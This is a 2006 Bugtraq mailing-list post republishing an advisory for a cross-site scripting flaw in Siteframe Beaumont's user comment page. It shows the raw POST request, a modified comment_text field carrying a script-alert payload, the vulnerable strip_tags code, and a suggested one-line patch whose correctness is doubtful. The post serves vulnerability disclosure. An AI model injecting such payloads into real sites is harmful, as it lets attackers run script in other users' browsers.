Re: Siteframe Beaumont 5.0.2 <== User Comment Cross-Site Scripting Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Re: Siteframe Beaumont 5.0.2 <== User Comment Cross-Site Scripting Vulnerability
From: federico.alice@xxxxxxxxxx
Date: 16 Feb 2006 22:01:49 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Sorry, but the advisory is this:

Siteframe Beaumont 5.0.2 <== User Comment Cross-Site Scripting Vulnerability 

####################################

Information of Software: 

Software: Siteframe Beaumont 5.0.1a  
Site: http://www.siteframe.org/
Description of software: Siteframe is a lightweight content-management 
system designed for the rapid deployment of community-based websites. 
With Siteframe,a group of users can share stories and photographs, create 
blogs, 
send email to one another, and participate in group activities.

####################################

Bug:

Siteframe contains a flaw that allows a remote cross site scripting attack. 
The vulnerability is found in the user comment page and the user can modify 
the function GET and insert the XSS code

- http POST request

http://[target]/edit/Comment
POST /edit/Comment HTTP/1.1
Host: [target]
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it-IT; rv:1.7.12) 
Gecko/20050919 Firefox/1.0.7
Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: it,it-it;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 167
comment_id=&comment_user_id=554&comment_page_id=116&comment_reply_to=&comment_subject=Kiki&comment_text=Hi&_submitted=1

but we can modify the request POST in this way:

comment_id=&comment_user_id=554&comment_page_id=116&comment_reply_to=&comment_subject=Kiki&comment_text=<script>alert("lol");</script>&_submitted=1

---------------------------------------------------------

Example:

you can insert in the text post an XSS code or you can modify the request in 
this way:

comment_id=&comment_user_id=554&comment_page_id=116&comment_reply_to=&comment_subject=Kiki&comment_text=[XSS]&_submitted=1

---------------------------------------------------------

The bug is in this part of DataObject.class.inc

[...]
    // strip html
    if ($info['formatted'] == 'ANY')
        ; // anything is allowed
    else if ($info['formatted'])
        $val = strip_tags($val, config('allowed_html'));
    else if ($info['type'] != 'xml')
        $val = strip_tags($val);
[...]

- Patch

in includes/DataObject.class.inc, change this:

    if ($info['formatted'] == 'ANY')

to this:

    if (!strcasecmp($info['formatted'], 'ANY'))

####################################

Credit:

Author:  Kiki
e-mail: federico.sana@xxxxxxxx
web page: http://kiki91.altervista.org

####################################

Prev by Date: Soldier of Fortune II format string through PunkBuster 1.180
Next by Date: [USN-252-1] gnupg vulnerability
Previous by thread: Siteframe Beaumont 5.0.2 <== User Comment Cross-Site Scripting Vulnerability
Next by thread: Winamp .m3u fun again ;)
Index(es):
- Date
- Thread